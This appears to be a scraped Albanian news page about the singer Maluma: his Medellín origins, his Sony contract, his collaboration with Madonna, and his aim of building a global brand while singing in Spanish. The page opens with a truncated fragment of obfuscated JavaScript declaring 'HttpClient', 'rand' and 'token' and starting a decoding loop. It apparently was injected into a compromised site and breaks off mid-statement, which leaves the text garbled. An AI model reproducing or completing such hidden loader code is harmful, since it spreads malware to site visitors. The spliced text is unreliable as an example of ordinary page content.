;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Maluma u bë shumë i suksesshëm, këngëtari tregon se depërtimi i tij ishte tejet i vështirë

By

Juan Luis Londoño Arias, i njohur profesionalisht si Maluma, është një këngëtar dhe reper, kolumbia. Ai ka nënshkruar kontratë në Sony Music Columbia dhe Sony Latin.

Lindur dhe rritur në Medellín, ai zhvilloi një interes për muzikën në një moshë të re dhe filloi të krijojë këngë në moshën 16 vjeç.

Ai sot definon muzikën e tij si pop urban, dhe ka arritur të ndajë skenën me të madhen Madonna, pasi që ka bashkëpunuar më të në dy këngë për albumin e tij të ri.

Mirëpo super kontrata e tij nuk është sukses brenda natës. “Industria amerikane nuk po i kushtonte vëmendje muzikës latine” – tha 25 vjeçari, aspiratat e të cilit janë jo vetëm të bëhet i suksesshëm në SHBA, po edhe të krijojë një brend botëror. “Ky është qëllimi im numër 1,” – thotë ai.

“Nuk dua të dukem si Justin Timberlake apo Justin Bieber – dua të këndoj në spanjollisht që të ju bëjë të bini në dashuri më esencën dhe kulturën time. Un nuk sfidoj asnjë këngëtar amerikan. Ndjej se mund ta pushtoj botës kështu siç jam.”

Burimi: Variety.com

 

Artikuj të ngjashëm